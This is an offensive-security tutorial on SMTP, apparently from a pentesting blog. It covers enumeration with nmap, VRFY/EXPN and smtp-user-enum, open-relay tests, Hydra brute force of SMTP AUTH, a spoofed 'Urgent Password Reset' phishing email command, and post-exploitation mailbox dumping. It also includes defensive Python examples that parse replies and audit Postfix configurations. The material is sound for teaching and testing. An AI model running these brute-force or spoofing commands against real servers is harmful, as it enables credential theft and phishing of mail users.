Understanding and Exploiting SMTP: A Pentester’s Guide
Category: Exploiting Services
Author: Offensive Cyber Professional
Focus: Enumeration → Exploitation → Post-Exploitation
Overview: What is SMTP?
SMTP (Simple Mail Transfer Protocol) is the protocol used to send emails across networks. It operates over TCP port 25 (and sometimes 587 or 465 for submission and encrypted channels). While it’s essential for mail delivery, SMTP servers can also leak sensitive information or become entry points if misconfigured.
As a pentester, understanding SMTP is critical for:
- Information gathering: Enumerating users
- Brute-force attacks: Cracking credentials
- Command injection: If combined with vulnerable webmail interfaces
- Pivoting or spoofing: Sending crafted emails internally
SMTP Basics
- Default Port: 25 (unencrypted), 587 (STARTTLS), 465 (SMTPS)
- Protocol: TCP
- Common Software: Postfix, Exim, Sendmail, Microsoft Exchange
SMTP isn’t used for reading email (that’s IMAP or POP3). It’s used for sending email to other mail servers or relays.
Scanning for SMTP
Start with Nmap to check if SMTP is open and determine the server type.
```bash
nmap -p 25,465,587 -sV <target-ip>
# Checks for SMTP-related ports and service version
```
Use Nmap’s SMTP-specific scripts:
```bash
nmap -p 25 --script smtp-enum-users,smtp-open-relay,smtp-commands <target-ip>
# smtp-enum-users: tries VRFY and EXPN to discover users
# smtp-open-relay: checks if the server can relay spam
# smtp-commands: lists supported SMTP commands
```
Enumeration
Once you’ve found an SMTP service, connect manually and test it using Netcat or Telnet.
```bash
telnet <target-ip> 25
```
Typical banner:
```text
220 mail.target.com ESMTP Postfix
```
Test VRFY:
```text
VRFY root
VRFY admin
```
Test EXPN:
```text
EXPN root
```
Both commands ask the server to confirm whether the named user (or, for EXPN, mailing list) exists; the reply code tells you whether it answered.
Useful Tool: smtp-user-enum
```bash
smtp-user-enum -M VRFY -U users.txt -t <target-ip>
# Enumerate usernames via VRFY
```
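Reading the replies correctly matters more than sending the commands: a server can answer VRFY with 250 (confirmed), 252 (accepted but not confirmed), 550 (no such user) or 502 (command disabled), and even a 252-versus-550 difference tells the client which names are real. The following is an added example, not code from this guide or from smtp-user-enum; it parses RFC 5321 style (possibly multi-line) replies from a constructed transcript and classifies what each VRFY/EXPN answer reveals, which is the same logic a defender would use to verify that VRFY is really switched off.

```python
"""Parse raw SMTP replies and interpret what VRFY/EXPN answers reveal.

Added example for the enumeration section, not code from the original guide
or from smtp-user-enum. The session text below is constructed, not captured
from any real host.
"""
import re
from dataclasses import dataclass, field

# Constructed transcript of server replies to: connect, EHLO, VRFY root,
# VRFY nosuchuser, EXPN root. A '-' after the code means more lines follow.
SAMPLE_SESSION = """220 mail.example.test ESMTP Postfix
250-mail.example.test
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-STARTTLS
250 8BITMIME
252 2.0.0 root
550 5.1.1 <nosuchuser>: Recipient address rejected: User unknown
502 5.5.2 Error: command not recognized
"""

REPLY_LINE = re.compile(r"^(\d{3})([ -])(.*)$")


@dataclass
class Reply:
    code: int
    lines: list = field(default_factory=list)


def parse_replies(text):
    """Split server output into Reply objects, honouring multi-line replies."""
    replies, current = [], None
    for raw in text.splitlines():
        m = REPLY_LINE.match(raw)
        if not m:
            raise ValueError(f"not an SMTP reply line: {raw!r}")
        code, sep, msg = int(m.group(1)), m.group(2), m.group(3)
        if current is None:
            current = Reply(code)
        elif current.code != code:
            raise ValueError("reply code changed inside a multi-line reply")
        current.lines.append(msg)
        if sep == " ":  # a space after the code marks the final line
            replies.append(current)
            current = None
    if current is not None:
        raise ValueError("unterminated multi-line reply")
    return replies


def ehlo_extensions(reply):
    """Keywords advertised in an EHLO reply (the first line is the hostname)."""
    if reply.code != 250:
        return set()
    return {line.split()[0].upper() for line in reply.lines[1:] if line.strip()}


def interpret_vrfy(reply):
    """Translate a VRFY/EXPN reply code into what it tells an auditor."""
    if reply.code in (250, 251):
        return "exists"        # server confirmed the mailbox or list
    if reply.code == 252:
        return "unverified"    # server will attempt delivery but won't confirm
    if reply.code in (550, 551, 553):
        return "unknown"       # server says no such user: still informative
    if reply.code in (500, 502):
        return "disabled"      # command not implemented or switched off
    return "other"


def leaks_user_existence(probe_replies):
    """True if the VRFY/EXPN replies let a client tell real users from fake ones."""
    verdicts = {interpret_vrfy(r) for r in probe_replies}
    return "exists" in verdicts or "unknown" in verdicts


if __name__ == "__main__":
    replies = parse_replies(SAMPLE_SESSION)
    print("EHLO extensions:", sorted(ehlo_extensions(replies[1])))
    for r in replies[2:]:
        print(r.code, "->", interpret_vrfy(r))
    print("leaks user existence:", leaks_user_existence(replies[2:]))
```

Feed it the replies from a manual Telnet session (minus your own commands) and `leaks_user_existence` tells you whether the server distinguishes valid from invalid names; a hardened server answers every probe with the same 502, so the set of verdicts collapses to `{"disabled"}`.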
Exploitation
1. SMTP Open Relay Abuse
An open relay allows you to send mail to any domain without authentication. This can be abused to send phishing emails, spam, or malicious payloads.
Test with swaks:
```bash
swaks --to victim@example.com --from attacker@attacker.com --server <target-ip>
# If it works without auth, it's an open relay
```
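What the swaks probe actually exercises is the server's RCPT TO decision: a correctly configured MTA accepts a recipient only when the destination domain is one it delivers for, the client authenticated, or the client sits in a trusted network, and otherwise answers 554 "Relay access denied". The block below is an added example, not code from this guide, from swaks or from any MTA; it models that decision with a permissive policy beside a restricted one (constructed domains and networks) and prints both sides of the exchange so the difference between an open relay and a refusal is visible.

```python
"""Model the RCPT TO decision that separates an open relay from a restricted one.

Added example for the open-relay section; not code from the guide, from swaks
or from any MTA. The policy is a simplified version of the shape Postfix-style
relay restrictions take, with constructed domains and networks.
"""
from ipaddress import ip_address, ip_network

# Constructed: domains this server delivers for, and networks it trusts to relay.
LOCAL_DOMAINS = {"example.test"}
MYNETWORKS = [ip_network("127.0.0.0/8"), ip_network("10.0.0.0/8")]


def _domain(address):
    return address.rsplit("@", 1)[-1].lower()


def open_relay_rcpt(client_ip, authenticated, rcpt):
    """Misconfigured policy: every recipient is accepted from anyone."""
    return "250 2.1.5 Ok"


def restricted_rcpt(client_ip, authenticated, rcpt):
    """Correct policy: deliver locally, or relay only for trusted/authenticated clients."""
    if _domain(rcpt) in LOCAL_DOMAINS:
        return "250 2.1.5 Ok"              # final delivery here is not relaying
    if authenticated:
        return "250 2.1.5 Ok"              # SMTP AUTH succeeded earlier in the session
    if any(ip_address(client_ip) in net for net in MYNETWORKS):
        return "250 2.1.5 Ok"              # internal client, allowed to relay out
    return f"554 5.7.1 <{rcpt}>: Relay access denied"


def session(policy, client_ip, authenticated, mail_from, rcpt):
    """Client (C:) and server (S:) lines for one envelope under the given policy."""
    rcpt_reply = policy(client_ip, authenticated, rcpt)
    lines = [
        "S: 220 mail.example.test ESMTP",
        "C: EHLO probe.invalid",
        "S: 250 mail.example.test",
        f"C: MAIL FROM:<{mail_from}>",
        "S: 250 2.1.0 Ok",
        f"C: RCPT TO:<{rcpt}>",
        f"S: {rcpt_reply}",
    ]
    if rcpt_reply.startswith("250"):
        lines += ["C: DATA", "S: 354 End data with <CR><LF>.<CR><LF>"]
    else:
        lines += ["C: QUIT", "S: 221 2.0.0 Bye"]
    return lines


def is_open_relay(policy):
    """The relay test: an outside, unauthenticated client to an outside domain."""
    reply = policy("203.0.113.7", False, "someone@external.invalid")
    return reply.startswith("2")


if __name__ == "__main__":
    for name, policy in (("open", open_relay_rcpt), ("restricted", restricted_rcpt)):
        print(f"--- {name} policy, open relay: {is_open_relay(policy)}")
        for line in session(policy, "203.0.113.7", False, "a@sender.invalid", "someone@external.invalid"):
            print(line)
```

Note that the restricted policy still accepts the outside client when the recipient is local: that is ordinary inbound mail, not relaying, which is why a relay test must use a recipient domain the server does not host.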
2. SMTP Credential Brute-Force
Try SMTP AUTH brute-forcing with Hydra:
```bash
hydra -S -s 587 -V -f -l user -P /usr/share/wordlists/rockyou.txt <target-ip> smtp
```
3. Email Spoofing (Internal Phishing)
If no authentication is needed, craft and send internal-looking emails from a spoofed sender:
```bash
swaks --to ceo@company.com --from it-support@company.com --server <target-ip> --data "Subject: Urgent Password Reset\n\nClick here."
```
4. Command Injection via Email Parsers
Sometimes, the SMTP service integrates with local scripts (e.g., contact forms or mail forwarding). If these scripts don’t sanitize input properly, they can be vulnerable to command injection or shell escape via crafted email headers (like Subject: or From:). This is rare but possible in older internal environments.
Post-Exploitation (if SMTP server is compromised)
If you gain access to the mail server:
- Dump mailbox contents – Look for credentials, internal comms, or reset links
- Abuse trust – Pivot using spoofed emails or forged internal messages
- Check for sensitive config files: main.cf, .forward, .procmailrc, etc.
Useful Tools
| Tool | Purpose |
|---|---|
| swaks | Custom SMTP testing (SMTP Swiss Army Knife) |
| smtp-user-enum | Username enumeration via SMTP |
| hydra | Brute-force SMTP AUTH credentials |
| msfconsole | Modules like auxiliary/scanner/smtp/smtp_enum and smtp_relay |
Defense Tips (Blue Team Perspective)
- Disable or tightly control VRFY and EXPN
- Require authentication for mail relay
- Use TLS and proper SPF/DKIM/DMARC DNS records to prevent spoofing
- Keep SMTP daemons patched and isolated
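For a Postfix server the first three tips map onto specific main.cf parameters: `disable_vrfy_command = yes`, an `smtpd_relay_restrictions` list that ends in `defer_unauth_destination` or `reject_unauth_destination`, and an `smtpd_tls_security_level` other than `none`. The following is an added example, not tooling from Postfix or from this guide: it parses a main.cf (including Postfix's whitespace-continued values) and reports which of those tips are missing, with a constructed weak configuration beside the hardened one.

```python
"""Check a Postfix main.cf against the defense tips above.

Added example, not tooling from Postfix or from the guide. The parameter names
(disable_vrfy_command, smtpd_relay_restrictions, smtpd_tls_security_level) are
real Postfix settings; both configuration texts are constructed for illustration.
"""

# Constructed: a permissive configuration with the problems the guide describes.
WEAK_MAIN_CF = """\
myhostname = mail.example.test
disable_vrfy_command = no
smtpd_relay_restrictions = permit
smtpd_tls_security_level = none
"""

# Constructed: the same host after applying the tips. Lines starting with
# whitespace continue the previous parameter, as Postfix allows.
HARDENED_MAIN_CF = """\
myhostname = mail.example.test
disable_vrfy_command = yes
smtpd_relay_restrictions =
    permit_mynetworks,
    permit_sasl_authenticated,
    defer_unauth_destination
smtpd_tls_security_level = may
"""

UNAUTH_GUARDS = ("defer_unauth_destination", "reject_unauth_destination")


def parse_main_cf(text):
    """Return {parameter: value}. '#' in column 1 is a comment; indented lines continue the previous value."""
    params, last_key = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        if raw[0] in " \t" and last_key is not None:
            params[last_key] = (params[last_key] + " " + raw.strip()).strip()
            continue
        if "=" not in raw:
            continue
        key, value = raw.split("=", 1)
        last_key = key.strip()
        params[last_key] = value.strip()
    return params


def restriction_list(value):
    """Split a Postfix restriction list on commas and whitespace into lowercase tokens."""
    return [t for t in value.replace(",", " ").lower().split() if t]


def audit(params):
    """Return a list of findings; an empty list means the three tips are applied."""
    findings = []
    if params.get("disable_vrfy_command", "no").lower() != "yes":
        findings.append("VRFY enabled: set disable_vrfy_command = yes")
    relay = restriction_list(params.get("smtpd_relay_restrictions", ""))
    if not relay:
        findings.append("smtpd_relay_restrictions not set explicitly: define it")
    else:
        # Restrictions are evaluated left to right, so a bare 'permit' before the
        # unauthenticated-destination guard makes the guard dead code.
        guard = next((i for i, t in enumerate(relay) if t in UNAUTH_GUARDS), None)
        permit_all = relay.index("permit") if "permit" in relay else None
        if guard is None or (permit_all is not None and permit_all < guard):
            findings.append("relay open to unauthenticated clients: end "
                            "smtpd_relay_restrictions with defer_unauth_destination "
                            "or reject_unauth_destination")
    if params.get("smtpd_tls_security_level", "none").lower() == "none":
        findings.append("TLS off: set smtpd_tls_security_level = may (encrypt on submission)")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_MAIN_CF), ("hardened", HARDENED_MAIN_CF)):
        print(f"--- {label}")
        for finding in audit(parse_main_cf(text)) or ["no findings"]:
            print(" ", finding)
```

Run it against `postconf -n` output or the file itself; `postconf -n` is the more reliable input because it already resolves continuation lines and shows only non-default values. The SPF/DKIM/DMARC part of the tip lives in DNS rather than main.cf, so it is outside what this check looks at.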
Final Thoughts
SMTP might look like a simple email transport service, but it’s a goldmine when misconfigured. Usernames, spoofed messages, and unauthenticated relaying can all open doors into a network. Always check for misconfigurations manually and with automation. A single overlooked VRFY or open relay could be your way in.
